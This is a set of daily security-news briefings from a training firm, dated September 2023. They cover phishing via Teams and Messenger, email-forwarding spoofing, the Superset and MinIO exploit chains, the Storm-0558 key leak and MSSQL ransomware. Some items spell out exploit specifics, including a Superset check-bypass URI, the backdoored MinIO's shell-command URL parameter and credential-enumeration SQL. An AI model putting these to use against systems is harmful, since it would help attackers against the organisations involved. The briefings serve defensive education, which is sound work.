Les Bell and Associates Pty Ltd

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Initial Access Broker Ramps Up MS Teams Attacks

A threat actor tracked by Microsoft as Storm-0324 (also TA543/Sagrid) has begun distributing payloads using an open-source tool called TeamsPhisher to send phishing lures through Microsoft Teams chats. Storm-0324 typically acts as an initial access broker - once it has compromised a victim, it then sells off access to other threat actors, by implanting their choice of loader, backdoor, stealer or ransomware (such as JSSLoader for ransomware-as-a-service operator FIN7).

Storm-0324 operates a sophisticated traffic distribution chain to bypass identification and filtering capabilities as they deliver phishing emails and malmails. Their emails often make references to invoices and payments, and they mimic cloud services like DocuSign, Quickbooks Online and others.

The Storm-0324 malware distribution chain typically redirects users to a Sharepoint-hosted compressed file - an MS Office document, a Windows Script File (.wsf) or VBScript - which then launches some malicious JavaScript to download the final malicious DLL payload. Since 2016, Storm-0324 has used a variety of first-stage payloads:

• Nymaim, a first-stage downloader and locker
• Gozi version 3, an infostealer
• Trickbot, a modular malware platform
• Gootkit, a banking trojan
• Dridex, a banking trojan
• Sage ransomware
• GandCrab ransomware
• IcedID, a modular information-stealing malware
• JSSLoader - a modular loader and infostealer

However, in July 2023, Storm-0324 began using phishing lures sent over Microsoft Teams with links leading to a malicious Sharepoint-hosted file, using TeamsPhisher, a Python program that enables Teams tenant users to attach files to messages sent to external tenants. These lures are identified by the Teams platform as "EXTERNAL" users (if the organization has  enabled external access in the first place).

Microsoft has rolled out a number of enhancements to the Accept/Block dialog in one-on-one chats within Teams, to better emphasize the external nature of a user and their email address. There are also new restrictions on the creation of domains within tenants and improved notifications to admins when new domains are created.

Microsoft makes a number of recommendations for Teams customers, including better user education, deployment of phishing-resistant authentication mechanisms such as security keys or software TOTP authenticator apps and allowing chat and meetings with only specific trusted organizations.

Microsoft Threat Intelligence, Malware distributor Storm-0324 facilitates ransomware access, blog post, 12 September 2023. Available online at https://www.microsoft.com/en-us/security/blog/2023/09/12/malware-distributor-storm-0324-facilitates-ransomware-access/.

CISA Releases Open Source Software Security Roadmap

The US Cybersecurity & Infrastructure Security Agency has released its Open Source Software Security Roadmap which lays out the agency's path to helping ensure a secure FLOSS ecosystem. The impact of highly-publicized vulnerabilities in open source software, and the related exploits such as Log4Shell, demonstrates that this effort could return significant benefits.

The roadmap lays out four key goals, each with subsidiary objectives:

• Establish CISA's Role in Supporting the Security of OSS
  • Partner with OSS Communities
  • Encourage Collective Action From Centralized OSS Entities
  • Expand Engagement and Collaboration With International Partners
  • Establish and Organize CISA’s OSS Work
• Drive Visibility into OSS Usage and Risks
  • Understand OSS Software Prevalence
  • Develop a Framework for OSS Risk Prioritization
  • Conduct Risk-Informed Prioritization of OSS Projects in Federal Government and Critical Infrastructure
  • Understand Threats to Critical OSS Dependencies
• Reduce Risks to the (US) Federal Government
  • Evaluate Solutions to Aid in Secure Usage of OSS
  • Develop Open Source Program Office Guidance For Federal Agencies
  • Drive Prioritization of Federal Actions in OSS Security
• Harden the OSS Ecosystem
  • Continue to Advance SBOM (Software Bill of Materials) Within OSS Supply Chains
  • Foster Security Education for Open Source Developers
  • Publish Guidance on OSS Security Usage Best Practices
  • Foster OSS Vulnerability Disclosure and Response

The roadmap aims to address two primary classes of open-source vulnerabilities and exploits: the cascading effects of vulnerabilities in widely-used libraries and subsystems which ship as part of larger applications, and supply-chain attacks on open-source repositories, which then lead to compromise of downstream software.

The Agency is inviting feedback on its open-source efforts, at OpenSource@cisa.dhs.gov.

CISA, CISA Open Source Software Security Roadmap, resource, 12 September 2023. Available online at https://www.cisa.gov/resources-tools/resources/cisa-open-source-software-security-roadmap.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

CISA Warns of Apple Device Vulnerabilities

The Cybersecurity & Infrastructure Security Agency has added two new vulnerabilities to the Known Exploited Vulnerabilities Catalog, warning that "these types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise." The two vulnerabilities, which are present in iOS, iPadOS and macOS are:

• CVE-2023-41064 - a buffer overflow vulnerability in imageIO which allows remote code execution when processing a maliciously-crafted image
• CVE-2023-41061 - an input sanitization vulnerability affecting Wallet which allows remote code execution when processing a maliciously-crafted attachment

The two vulnerabilities can be chained to create a zero-click exploit chain - i.e. with no user interaction required - used to deliver NSO Group's Pegasus spyware. The exploit chain was discovered by The Citizen Lab of the Munk School at University of Toronto while examining the device of an individual employed by a Washington DC-based NGO with international offices.

Citizen Lab stated:

Apple has fixed the vulnerabilities in iOS 16.6.1, iPadOS 16.6.1 and macOS Ventura 13.5.2; users are encouraged to upgrade as soon as possible.

CitizenLab, BLASTPASS: NSO Group iPhone Zero-Click, Zero-Day Exploit Captured in the Wild, news release, 7 September 2023. Available online at https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click-zero-day-exploit-captured-in-the-wild/.

CISA, CISA Adds Two Known Vulnerabilities to Catalog, cybersecurity advisory, 11 September 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/09/11/cisa-adds-two-known-vulnerabilities-catalog.

MrTonyScam Stealer Spreads Via Facebook Messenger

A campaign to steal the Facebook and other accounts of businesses is spreading via Facebook Messenger. The campaign, dubbed "MrTonyStealer", originates in Vietnam, according to Guardio Labs researcher Oleg Saytsev, and while it relies on social engineering the victim into downloading a file attachment, unzipping and then running it, it is achieving a concerning success rate, with roughly one in each 350 recipients becoming infected.

The goal is to hijack Facebook business accounts that have a good reputation, seller rating and many followers, with the intention of selling them on Telegram and other dark markets. The purchaser can then use such an account for advertising or scams. And business account owners are particularly vulnerable: while private users can happily ignore messages from unkown senders, a business cannot ignore what could be a legitimate enquiry, especially if the lure message threatens a copyright strike or other penalty. And, of course, once the stealer infects the victim, it can also gather credentials for other accounts - banks, cloud-hosted accounting, email, e-commerce platforms, etc. - from the browser's cookies and stored passwords.

The attack delivers an archive file - .rar or .zip - which the recipient is lured to download and open to reveal a batch file. This is a first-stage dropper which, if run, downloads a stage 2 dropper from GitHub. This, in turn, starts the Chrome browser, pointing it to the Alibaba web site as a distraction, while in the background it downloads additional components and starts the main stealer, called project.py, in a standalone Python environment and makes it persistent via a startup batch file.

Once running, the stealer extracts all cookies and login credentials from the victim's browsers, sending them to a Telegram channel via the Telegram/Discord bot API, and then deletes all the cookies, locking the victim out of their accounts and giving the scammers time to hijack the session and change the password. The code uses a variety of obfuscation and detection evasion techniques, but the presence of Vietnamese-language comments in the code, and the inclusion of the "Coc Coc" Chromium-based browser, popular in Vietnam, betray its origin.

The GuardIO blog post provides a comprehensive analysis and IOC's, but the basic message, and mitigation technique, is obvious: don't just double-click on Facebook Messenger attachments, and treat archive files as highly suspicious.

Zaytsev, Oleg, “MrTonyScam” - Botnet of Facebook Users Launch High-Intent Messenger Phishing Attack on Business Accounts, blog post, 11 September 2023. Available online at https://labs.guard.io/mrtonyscam-botnet-of-facebook-users-launch-high-intent-messenger-phishing-attack-on-business-3182cfb12f4d.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Dymocks Latest Ransomware Victim

Australian bookstore chain Dymocks is the latest victim of ransomware attack. In an email titled "Important Update About Your Dymocks Information", sent to customers on Friday afternoon (8 September), the firm disclosed that on 6 September it had become aware of discussions regarding its customer records being made available on the dark web.

At the time the email was sent, the company was unaware of the precise nature of the attack or which customers were affected, but the information they hold includes:

• date of birth
• postal address
• email address
• mobile number
• gender
• membership details such as gold expiry date, account status, member created date and card ranking

Dymocks does not store credit card or other financial data, but what they do hold could form the basis of some scams and identity fraud. Dymocks' email procides the usual guidance such as changing passwords, monitoring bank statements, and being alert to scams.

However, Have I Been Pwned states that the breach actually occurred in June, and the data set comprises 1.2 million records with 836,120 unique email addresses.

Dymocks Pty Ltd, Important Update About Your Dymocks Information, email, 8 September 2023.

Scammers Can Abuse Email Forwarding

In a paper presented at the 8th European Symposium on Privacy and Security in July - winning the best paper award - researchers from UC San Diego, Stanford and University of Twente revealed that flaws in how major email services process the forwarding of email can make it easier for email scam and phishing operators to impersonate legitimate email addresses at high-profile domains.

The basic problem is that spam filtering techniques mostly work on the assumption that each Internet domain operates its own email infrastructure so that, for example, a reverse DNS lookup for a connecting IP address (using the PTR resource record) will return a hostname that matches a host in the same domain. More advanced protections such as SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) implicitly incorporate this assumption.

However, most  enterprises today have outsourced their email infrastructure to a few, very large, service providers - most notably Microsoft (outlook.com) and Google (gmail.com) - and while these companies validate that their users only send email on behalf of the domains they operate, this validation can be bypassed by email forwarding

Forwarding is both ubiquitous and necessary in the email ecosystem, due to the wide use of email filtering services, mailing lists and autoforwarding employed by individual users and small and medium enterprises, who often use a web hosting account to forward inbound email to their Outlook or Gmail account.

The researchers identified four different approaches in the way mail services rewrite the sender and recipient fields in the SMTP envelope and email headers while forwarding and email to its recipient. Using the domain of the US Department of State (state.gov) as an example, they showed how an attacker can create a spoofed email with a fake identity which appears to come from the Department, and then forward it through their personal Outlook account. To the recipient, this will appear legitimate, since it comes from an Outlook email server - and the Department of State uses Outlook as its email provider.

This works because, almost uniquely, Outlook uses a custom forwarding implementation which the researchers term "MAIL FROM Equals FROM" (MFEF). This not only rewrites the RCPT TO header to be the final recipient (to whom the email is being forwarded) but also sets the MAIL FROM header to be the same as the FROM header. While this will break SPF, the fact is that this and similar problems have hindered the adoption of SPF and DMARC, forcing email providers to use customised defenses.

Variants of this flaw affect five other email providers including iCloud, while smaller issues impact users of Gmail and Zohomail, a popular Indian email provider. The researchers disclosed the vulnerabilities to the various providers, some of whom fixed the issues or at least are working on them.

Liu, Enze, et. al, Forward Pass: On the Security Implications of Email Forwarding Mechanism and Policy, Proc. 8th IEEE Symposium on Privacy and Security, 3 - 7 July 2023, Delft. Available online at https://arxiv.org/abs/2302.07287.

Patringenaru, Ioana, Scammers Can Abuse Security Flaws in Email Forwarding to Impersonate High-profile Domains, UC San Diego Today, 5 September 2023. Available online at https://today.ucsd.edu/story/forwarding_based_spoofing.

China Ramps Up Cyber-Espionage, Disinformation Campaigns

A new report from Microsoft Threat Intelligence warns that China has ramped up both  its cyber-espionage efforts against the US defence and critical infrastructure sectors, and its online influence operations to destabilise the US political environment.

The operations by China-affiliate threat actors have focused on three areas in particular:

• The South China Sea and Taiwan, reflecting conflicts over territorial claims, rising tensions across the Taiwan Strait, and increased US military presence in the region
• The US defence industrial base, particularly enterprises with any connection to the satellite and telecommunications facilities associated with the US Marine Corps base in Guam
• US critical infrastructure across multiple sectors including transportation, utilities, medical (e.g. hospitals) and telecommunications, particularly with the potential to disrupt US-Asia communications

China has also become significantly more effective in engaging social media users with influence operations, switching from a strategy of deluging social networks via bots to engaging directly with authentic users, targeting specific candidates in content about US elections and posing as US voters. Microsoft estimates that this initiative has successfully engaged target audiences in at least 40 languages and grown its audience to over 103 million.

The operators behind some of these social media accounts have begun using generative AI to create visual content which is more eye-catching than the memes used in previous campaigns. Authentic users often repost these, despite their obvious clues of AI generation, such as more than five fingers on the torch-holding hand of the Statue of Liberty. Other accounts pose as independent social media influencers, despite being employed by Chinese state media in what the Chinese Communist Party terms "multilingual internet celebrity studios".

In online news media, Chinese state media has been artfully positioning itself as the authoritative voice in international discourse on China, using a variety of means to exert influence in media outlets worldwide, such as localized news websites which push Chinese Communist Party propaganda to the Chinese diaspora in over 35 countries.

The report also covers increasingly sophisticated operations by North Korea, as the regime has set high-priority requirements for its cyber-espionage operations, particularly for maritime technologies, as well as increasing cryptocurrency theft and supply chain attacks.

Microsoft Threat Intelligence, Digital threats from East Asia increase in breadth and effectiveness, report, 7 September 2023. Available online at https://www.microsoft.com/en-us/security/business/security-insider/reports/nation-state-reports/digital-threats-from-east-asia-increase-in-breadth-and-effectiveness/ (full report PDF at https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RW1aFyW).

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Mirai Derivative Exploits Android TV's

Russian anti-malware company Dr. Web reports the identification of a new family of trojans that compromises Android TV devices, either during firmware updates or when applications for watching pirated video content are installed. This new backdoor sports advanced DDoS attack capabilities by using code from the Mirai botnet trojan.

Dubbed Android.Pandora.2, the trojan seems to be a modification of the Android.Pandora.10 backdoor (also known as Android.Backdoor.334). It targets low-end Android TV set-top boxes such as the Tanix TX6 TV Box, MX10 Pro 6K and H96 MAX X3. An analysed sample arrived as a malicious formware update - released in December 2015 (!) - for the MTX HTV BOX HTV3 device and has likely been deployed to a number of websites. Other samples target Spanish-speaking users via apps for streaming pirated movies and TV shows, via domains with names like 'youcine', 'magistv', 'latinatv' and 'unitv' this variant has a different installation process and is identified as Android.Pandora.4.

The main malware is a file called /system/bin/pandoraspearrk, which joins the infected system to a DDoS botnet; it is monitored by a process called /system/bin/supervisord which will restart it if it is killed. It also installs its own copies of the busybox shell and curl. Once installed and running, the trojan will accept commands to start and stop various DDoS attacks, open a reverse shell, mount partitions in RW mode, etc.

This malware illustrates the dangers posed by IoT device users who know just enough to side-load their devices with code from dubious sources but not enough to secure them; they may well get cheap functionality and access to pirated content, but their devices can become useful platforms for attackers interested in bigger fish.

Dr. Web, Pandora's box is now open: the well-known Mirai trojan arrives in a new disguise to Android-based TV sets and TV boxes, news release, 6 September 2023. Available online at https://news.drweb.com/show/?lng=en&i=14743.

Apache Project Vulnerabilities

Two Apache projects are causing problems in the enterprise world.

The first is Apache RocketMQ, a distributed messaging and streaming middleware system, which has triggered action from CISA by adding CVE-2023-33246 to its list of known exploited vulnerabilities. Several components of RocketMQ, including NameServer, Broker and Controller are often exposed via an extranet but lack permission verification; an attacker can exploit this by using the 'update configuration' function to execute commands with privileges of the RocketMQ system account. Alternatively, they can also achieve remote command execution by forging RocketMQ protocol messages.

Affected users should upgrade to RocketMQ version 5.1.1 or above, or RocketMQ version 4.9.6 or above.

Meanwhile, researchers at Horizon3.ai warn of vulnerabiliities in Apache Superset, a popular Python open source data exploration and visualization tool based on the Flask web framework. A previous vulnerability, CVE-2023-27524 (also discovered by Horizon3.ai) could allow an attacker to obtain the Flask SECRET_KEY value and thereby obtain admin privileges, but this was mostly fixed in Superset 2.1.0. The two new high-severity vulnerabilities, CVE-2023-39265 and CVE-2023-37941, allow further exploitation - in some cases after using CVE-2023-27524 or other means of obtaining admin privileges, but in others from non-admin accounts.

CVE-2023-39265 allows a bypass of URI checking in the Superset UI, which would normally block connection to its own metadata database (which is SQLite, by default). The checks will fail if the supplied URI includes both the dialect and driver name, e.g.

sqlite+pysqlite:////app/superset_home/superset.db

After connecting to the metadata store, an attacker can then access it via SQLLab, allow database exploration, querying  and updates. The same vulnerability also applies to database connection information imported from files, allowing control of arbitrary SQLite metadata databases. In fact, if Superset is configured to use MySQL for the metadata database, it is also possible to obtain credentials for the database and also connect to it through the Superset UI.

CVE-2023-37941 extends this attack chain further, allowing remote code execution by an attacker with access to the metadata database. Vulnerable versions of Superset use Python's pickle package to store some configuration data, and the attacker can insert an arbitrary pickle payload into the database and then trigger its deserialization and execution.

These vulnerabilities are fixed in Superset version 2.1.1, and users should upgrade immediately.

CISA, CISA Adds One Known Vulnerability to Catalog, cybersecurity advisory, 6 September 2023. Available online at https://www.cisa.gov/news-events/alerts/2023/09/06/cisa-adds-one-known-vulnerability-catalog.

Sunkavally, Naveen, Apache Superset Part II: RCE, Credential Harvesting and More, blog post, 6 September 2023. Available online at https://www.horizon3.ai/apache-superset-part-ii-rce-credential-harvesting-and-more/.

Multiple Nation State Actors Exploit Zoho ManageEnging ServiceDesk Plus

Back in June, we reported on an campaign conducted by China-affiliated threat actor VANGUARD PANDA (also known as Volt Typhoon), exploiting Zoho ManageEngine ADSelfService Plus in order to obtain initial access, after which they deployed webshells and made use of living-off-the-land techniques to avoid leaving behind detectable artifacts which could be used as IOC's.

Now the US Cybersecurity & Infrastructure Security Agency, FBI and Cyber National Mission Force have published a joint cybersecurity advisory providing information on an incident which appears to be related. The agencies confirmed that a nation-state advanced persistent threat exploited CVE-2022-47966 (an RCE vuln related to yet another Apache project, xmlsec) to gain unauthorized access to a public-facing application (Zoho ManageEngine ServiceDesk Plus), establish persistence, and move laterally through the network of an aviation sector entity. Additional APT actors were also observed exploiting CVE-2022-42475 to establish presence on the organization’s firewall device.

The joint advisory provides a full, detailed analysis of initial access vectors and post-exploitation activities, including the tools the threat actor used, along with a mapping to MITRE ATT&CK techniques, detection methods and suggested mitigations.

CISA, Multiple Nation-State Threat Actors Exploit CVE-2022-47966 and CVE-2022-42475, cybersecurity advisory, 7 September 2023. Available online at https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-250a.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

BlackCat/ALPHV Claims More Scalps

Russian ransomware operation BlackCat, also known as ALPHV, has claimed a string of new scalps in Australia, apparently  through the compromise of a cloud service reseller. The group claims to have stolen over 4.95 TB (yes - that's terabytes) of data belonging to several companies:

• TissuPath, a pathology company
• Strata Plan, a property owners' corporation service provider
• Barry Plant Blackburn, a real estate agency
• Tisher Liner FC Law, a business and property law firm

The group is threatening to publish the data unless an extortion demand is paid. The nature of the data is unclear - much of it is undoubtedly financial data relating to real estate property owners, but TissuPath has stated that patient names, dates of birth, contact details, Medicare numbers and private health insurance details were exposed. It also claimed that its main database and reporting system was not compromised, and that the firm does not store patient financial data or identity documents such as drivers licence numbers.

Three of the firms above are clients of Core Desktop, a South Melbourne firm which provides managed services for Azure and Office 365. The firm first became aware of the breach on 22 August 2023 and, while uncertain of the initial compromise techniques, has shut down access to affected accounts, and reset administrator login credentials and client passwords to regain control of its systems.

The breach has been reported to the Office of the Australian Information Commissioner and the Australian Cyber Security Centre.

Tran, Danny, Russian ransomware gang AlphV targets pathology company, law firms in latest string of attacks, ABC News, 5 September 2023. Available online at https://www.abc.net.au/news/2023-09-05/russian-ransomware-gang-alphv-targets-pathology-company-law-firm/102817900.

CISA Vulnerability Summary for the Week of 28 August

CISA has released its weekly vulnerability summary, and as usual it makes interesting reading. Even just a quick scan of those vulnerabilities with a CVSS score of 9.8 - about as bad as it gets - turns up some informative entries, such as an authentication bypass in the Stripe Payment Plugin for the WooCommerce plugin for WordPress (up to and including v 3.7.7) which allows unauthenticated actors to log in as users who have orders. There's another authentication bypass vulnerability in VMware's Aria Operations for Networks, which will allow access to the command line interface via SSH.

The Internet of Things continues to provide examples of just how bad things can be, with four vulnerabilities in SpotCam FHD 2 wireless security cameras, including hard-coded credentials for both a hidden telnet server and for uBoot, as well as remote command injection.

Security-related products are, unfortunately, not immune, with a deserialization vulnerability, possibly allowing remote code execution, in Oracle's weblogic-framework vulnerability scanner, and a remote code execution vulnerability in Splunk Enterprise.

There's plenty to think about in the lower-scoring vulnerabilities, too.

CISA, Vulnerability Summary for the Week of August 28, 2023, security bulletin, 6 September 2023. Available online at https://www.cisa.gov/news-events/bulletins/sb23-249.

How Storm-0558 Got That Key

Back in July, we covered a series of attacks on US government agencies which were achieved using forged authentication tokens for Outlook Web Access in Exchange Online and Outlook.com. The threat actor involved, dubbed Storm-0558 by Microsoft, was able to sign the forged tokens using an acquired Microsoft Managed Service Account (MSA) consumer signing key, which was accepted for enterprise systems due to a token validation vulnerability. The attack was so significant that the Department of Homeland Security's Cyber Safety Review Board announced plans for an in-depth review on the malicious targeting of cloud computing environments, with the intention of strengthening identity management and authentication in the cloud.

However, one question remained unanswered: how did Storm-0558 obtain the Microsoft account consumer key in the first place? Such highly-trusted keys are normally subject to strong controls to prevent their being leaked.

Now, Microsoft Security Research Center has provided details of their technical investigation. As expected, Microsoft's production environment has such strong controls, including dedicated accounts, secure access workstations, and the use of multi-factor authentication based on hardware tokens. The production environment also prevents the use of email, conferencing, web research and other collaboration tools that commonly provide a path for malware infections. However, some data does leave the production environment.

The MSRC investigation revealed that a consumer signing system crash in April 2021 resulted in a process dump or 'crash dump' of the crashed process. Now, crash dumps redact sensitive information and should not include the signing key, but in this particular case, a race condition allowed the key to remain in the crash dump, and its presence there was not subsequently detected.

The crash dump was then moved from the isolated production network into a debugging environment on the Internet-connected corporate network. At some time after this, Storm-558 was able to compromise the account of a Microsoft engineer, which then gained them access to the debugging environment, the crash dump and the key. Although the logs from that time have not been retained, this seems the most likely way the threat actor obtained the key.

Microsoft states that the issues that allowed the key to leak via this improbable path - the race condition and the failure to detect the key in the crash dump in either the production or debugging environments - have now been corrected. This might have been a one-in-a-million exposure, but as Sir Terry Pratchett wryly observed, the strange thing about one-in-a-million events is that they happen so often.

MSRC, Results of Major Technical Investigations for Storm-0558 Key Acquisition, blog post, 6 September 2023. Available online at https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Twitter/X Collects More Personal Data

As Elon Musk plans to expand X - the social network formerly known as Twitter - into a do-everything social network, the platform has revised its privacy policy to reflect its plans to collect additional personal data from and about its users.

Musk has approvingly eyed the social networks in China for some time, and his acquisition of Twitter was apparently the first move in a plan to replicate their success. WeChat, in particular, combines instant messaging, voice messaging, social media, video conferencing, video games, location sharing and - perhaps of most interest to Musk - mobile payment, in the form of Weixin Pay. Despite the fact that WeChat, or Wexin, as it is known in China, shares user activity and tracking information with Chinese authorities, the app is hugely popular, with many users barely using anything else.

Perhaps remembering his early involvement in PayPal, Musk would like to expand 'X' to incorporate mobile payment functionality, if not a full marketplace. This will, of course, require stronger authentication, and so the platform has amended its privacy Policy (at https://twitter.com/en/privacy) to state, "Based on your consent, we may collect and use your biometric information for safety, security, and identification purposes". However, the company has not stated what types of biometric data could be collected - facial scans? Iris scans? Fingerprints? - or what they would be used for.

And perhaps eyeing the success of LinkedIn, another clause states:

Given the cutting back ot Twitter's online safety and security teams, many users will view these additions with some concern.

Threat Actor Turns Object Store Into Backdoor

A new exploit chain discovered by Security Joes Incident Response team links some recent vulnerabilities in order to trojanize the MinIO object storage application and turn it into a backdoor, allowing full control over victim systems.

Many cloud services - which tend to be written in object-oriented languages - need to store unstructured data of various kinds, and so such data stores are a common feature of cloud providers. Examples include Amazon's S3, Azure Blob (Binary Large object) Storage and Google Cloud storage. These services provide API's which allow objects to be directly persisted, as opposed to using an object-relational mapping layer to store and object across multiple tables of a relational database.

However, apart from the major cloud service providers' offerings, there are alternatives - among them MinIO, an open-source high-performance distributed object storage system for the Linux platform, which provides both a RESTful API and a command line interfaces. In the case highlighted by Security Joes, their MDR team observed a MinIO application executing a series of bash commands and trying to use curl to download Python scripts from external servers.

Closer investigation revealed that the MinIO binary was not the genuine code - rather, it had ben trojaned to add extra code which would receive and execute commands via HTTP requests. Analysis of the code, coupled with a search of external repositories showed that it came from a GitHib project named 'evil_minio'. According to its maintainer, this modified version performs just like the genuine MinIO but adds a backdoor that can be accessed by adding the desired command to an 'alive' parameter in the URL:

http://vulnerable.minio.server/?alive=[shell_command]

Almost no effort is required to use this - in fact, the project maintainer has documented it extensively in a PDF!

The question then became, how did this trojaned version of MinIO get installed? The answer lies in two vulnerabilities:

• CVE-2023-28432 - an information disclosure vulnerability which reveals the values of environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD
• CVE-2023--28434 - a vulnerability which allows crafted requests to bypass metadata bucket name checking and place an object into any bucket while processing PostPolicyBucket

And so installation of the trojaned version is achieved by first, obtaining the admin credentials using CVE-2023-28432 via a POST request to /minio/bootstrap/v1/verify, using these credentials to connect via a remote MinIO command line client and then triggering an update, pointing to an update repository controlled by the attacker (using a specific repository can be useful for installations which are behind a firewall).

From this point on, the trojaned MinIO installation backdoor can be used to connect to a C2 server, fetching and executing a variety of post-exploitation bash scripts which can, in turn, be used to profile the compromised system as well as performing network reconnaisance, among other tasks.

The Security Joes blog post provides comprehensive and detailed analysis, along with IOC's and a MITRE ATT&CK mapping of TTP's. The simplest mitigation is to upgrade any MinIO installation to RELEASE.2023-03-20T20-16-18Z or later.

Security Joes, New Attack Vector In The Cloud: Attackers caught exploiting Object Storage Services, blog post, 4 September 2023. Available online at https://www.securityjoes.com/post/new-attack-vector-in-the-cloud-attackers-caught-exploiting-object-storage-services.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories

Sydney University Discloses Data Breach

A third-party service provider to the University of Sydney has suffered a data breach affecting "a limited number of recently applied and enrolled international applicants’ personal data".  The breach was confined to a single platform, and has not affected other university systems; the University claims that there is no evidence that any personal information has been misused, although experience shows that such statements often have to be revised over time.

So far, it appears that no data relating to domestic students, staff, alumni or donors has been affected, and the University is working to contact impacted students and applicants.

This incident is just the latest to affect a university, as the education sector - and its third-party providers - becomes an increasingly popular target.

University of Sydney, Cyber incident, web page, 30 August 2023. Available online at https://www.sydney.edu.au/about-us/governance-and-structure/cybersecurity/cyber-incident.html.

MS SQL Servers Targeted With Ransomware

Researchers from the Securonix Threat Research team have identified a campaign which targets Internet-exposed Microsoft SQL Server systems by brute forcing a login. After gaining access, the attackers immediately enumerate the database, in particular searching for other login credentials by using SQL statements like

SELECT name FROM sys.sql_logins WHERE name IS NOT NULL

Upon discovering that the xp_cmdshell stored procedure was enabled (!), the attackers used it to run commands such as wmic, whoami, net use, etc., on the underlying machine in order to enumerate system and user information.

Next, in order to secure persistent access, the attackers created several user accounts in the administrators group, then made a number of changes to enable RDP access, disabled the system firewall and mounted a remote shared drive using the SMB protocol, allowing them to transfer files and install their tools. From there, they installed the AnyDesk remote desktop program to provide an additional access mechanism.

This was followed by the installation of a port scanner to enumerate the local network and credential dumping using Mimikatz. In the case analyzed by Securonix, the threat actor seems to have decided the local network was not worth further exploration, and they dropped a modified variant of the Mimic ransomware, which sets about identifying and encrypting target files before leaving a ransom note in a text file.

The Securonix researchers dubbed this ransomware variant "FreeWorld", and the campaign itself DB#JAMMER. Their report maps the various stages of the attack to the MITRE ATT&CK matrix, and also provides IOC's and suggested mitigations.

Iuzvyk, D., T. Peck and O. Kolesnikov, Securonix Threat Labs Security Advisory: Threat Actors Target MSSQL Servers in DB#JAMMER to Deliver FreeWorld Ransomware, blog post, 1 September 2023. Available online at https://www.securonix.com/blog/securonix-threat-labs-security-advisory-threat-actors-target-mssql-servers-in-dbjammer-to-deliver-freeworld-ransomware/.

These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

